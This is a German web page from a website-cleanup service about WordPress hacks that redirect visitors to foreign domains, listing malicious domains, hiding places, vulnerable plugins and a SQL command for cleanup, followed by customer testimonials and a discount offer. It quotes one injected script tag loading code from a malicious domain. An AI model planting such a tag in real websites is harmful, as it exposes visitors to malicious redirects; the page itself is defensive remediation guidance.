WordPress gehackt WeiterleitungBei vielen aktuellen WordPress Hacks kommt es zu dem Symptom, dass Aufrufe der Webseite auf eine fremde Domain weitergeleitet werden. Man spricht von "Malware Redirects" oder "Spam Weiterleitungen".
In diesem Artikel wird beleuchtet, wie es zu dieser Umleitung kommt und welche Variationen möglich sind. Denn nicht immer treten die Weiterleitungen regelmäßig auf, wodurch diese Art von Hack unter Umständen längere Zeit unerkannt bleibt.
Fest steht: Es muss dringend Abhilfe geschaffen werden, damit kein wertvoller Traffic verloren geht.

Wenn Sie keine Zeit verlieren möchten, zögern Sie nicht uns zu kontaktieren.
 

Involvierte Domainnamen

Allen voran sind derzeit hauptsächlich ns1.bullgoesdown.com und js.wiilberedmodels.com als eingeschleuste Script-Quellen oder Weiterleitungsziele involviert. Eine vollständige Liste der Domains, die auf einen Hack hindeuten (Stand September 2019):

  • wiilberedmodels.com
  • bullgoesdown.com
  • greatinstagrampage.com
  • gabriellalovecats.com
  • jackielovedogs.com
  • tomorrowwillbehotmaybe.com
  • activeandbanflip.com
  • developsincelock.com
  • blueeyeswebsite.com

WordPress Spam Weiterleitungen - mögliche Verstecke

Automatische Weiterleitungen können prinzipiell in jeder vom WordPress System geladenen Datei platziert worden sein - intern wie extern.
Daneben kommt es ebenfalls häufig zu Script Injektionen direkt in die Datenbank.
Es gibt diverse mögliche Verstecke für Spam Umleitungen:

  • Javascript Injektionen in PHP Dateien
  • Veränderte JS Dateien
  • Script Injektionen in Seiten und Beiträgen (Datenbank)
  • Script Injektionen in Widgets (Datenbank)
  • Modifizierte .htaccess Dateien
  • Eingebundene Werbenetzwerke (gehackte Adserver)

wp_content Tabelle per phpMyAdmin bereinigen

Eine typische Injektion, die sich in sämtlichen WordPress Posts wiederfinden kann, wäre zum Beispiel:

<script src="https://jackielovedogs.com/pret.js?l=1&" language="javascript" type="text/javascript"></script>

Mit folgenden SQL Befehl können Sie das Script entfernen:

UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src="https://jackielovedogs.com/pret.js?l=1&" language="javascript" type="text/javascript"></script>","");

Das Datenbanktabellen-Präfix  wp_  muss gegebenenfalls durch Ihr individuelles Präfix ersetzt werden.

Ursachenforschung - Sicherheitslücken schließen

Die Hauptursache für gehackte Webseiten sind veraltete Versionsstände. Sowohl WordPress selbst, als auch sämtliche Plugin und das Theme müssen regelmäßig aktualisiert werden.
Bei der aktuellen Malicious Redirect Kampagne werden folgende Plugins attackiert, die in älteren Versionen angreifbar sind:

  • Advanced Access Manager
  • Bold Page Builder
  • Blog Designer
  • Live Chat with Facebook Messenger
  • Yuzo Related Posts
  • Visual CSS Style Editor
  • WP Live Chat Support
  • Form Lightbox
  • Hybrid Composer
  • Woocommerce User Email Verification
  • Yellow Pencil Visual Theme Customizer
  • Coming Soon and Maintenance Mode
  • Alle NicDark plugins

Erfolgreich attackierte Plugins gehen aus unserem Access Log Analyse Tool hervor, das Sie gern für die weitere Untersuchung des Angriffs nutzen können. Ein gewisses technisches Verständnis wird vorausgesetzt. Bei Bedarf können wir die WordPress-Hack Bereinigung zum günstigen Festpreis für Sie übernehmen.

 

Ergänzende Angebote

Kunden über uns

„Umstellung unserer Joomla Website von PHP 5.3 auf PHP 7 lief super schnell, günstig und mit tadellosem Ergebnis. Sehr gute und nette Kommunikation.“
– H. Bergmann

„Innerhalb eines Tages wurde alles extrem professionell und extrem schnell gemacht. Sehr vertrauenswürdig. Excellent. 5 Sterne“
– Fernando V.

„Ich selbst wusste mir nicht zu helfen, fand hier aber die nötige Kompetenz, um alles wieder bereinigen zu lassen. Nötige Updates und Sicherungen wurden gemacht, alles äußerst preiswert, schnell und gut!“
– Klaus-Peter

„Die Seite sieht super aus – alles wie zuvor – und das unter PHP 7.2 – ich bin beeindruckt - ganz herzlichen Dank!“
– Dr. Ingo Wuddel

„Da wir einen Onlineshop betreiben war es für uns sehr wichtig, dass unsere Seite schnell wieder im vollen Funktionsumfang für unsere Kunden zur Verfügung steht. Alle Arbeiten wurden äußerst schnell zu unserer vollen Zufriedenheit ausgeführt.“  – Löwen Handels GmbH

„Sehr schnelle, seriöse und zielführende Bearbeitung des Problems. Zusätzlich wurden mir Tipps und Strato spezifische Infos mitgegeben, um das Risiko eines Wiederkehrens des Problems zu verringern.“
– Heino B.

„Der Kontakt war besonders freundlich, einige kosmetische Zusatzarbeiten wurden - als sei es selbstverständlich - von selbst in Angriff genommen. Ich bin erleichtert und sehr dankbar.“
– R. Mayer

„Super. In einer absoluten Notlage bei Sperrung von 2 Domains durch Strato wegen Hackerangriff wurden beide Domains zunächst temporär noch am gleichen Tag wieder live geschaltet.“
– I. Radchenko

„Hervorragender Service. Problem innerhalb von 18 Stunden gelöst. Wir sind begeistert. Vielen Dank 🙏“
– Tien Sy Vuong

Website-Bereinigung.de Support Service Google Bewertungen

Telefonische Anfrage

+49 (0)2406 969796
Mo. - Fr. | 9 - 17 Uhr
⇒ Telefonat vereinbaren

Diese E-Mail-Adresse ist vor Spambots geschützt! Zur Anzeige muss JavaScript eingeschaltet sein!
Kontaktformular
Live Support Chat starten

6 Jahre Website-Bereinigung.de SALE

Zum sechsjährigen Jubiläum bieten wir Ihnen die Hack-Bereinigung für nur 99 €* inkl. MwSt. an (regulär 169 €).
Nennen Sie uns den Gutscheincode

WB99

bei Ihrer Anfrage!
* Gültig bis zum 21.09.2019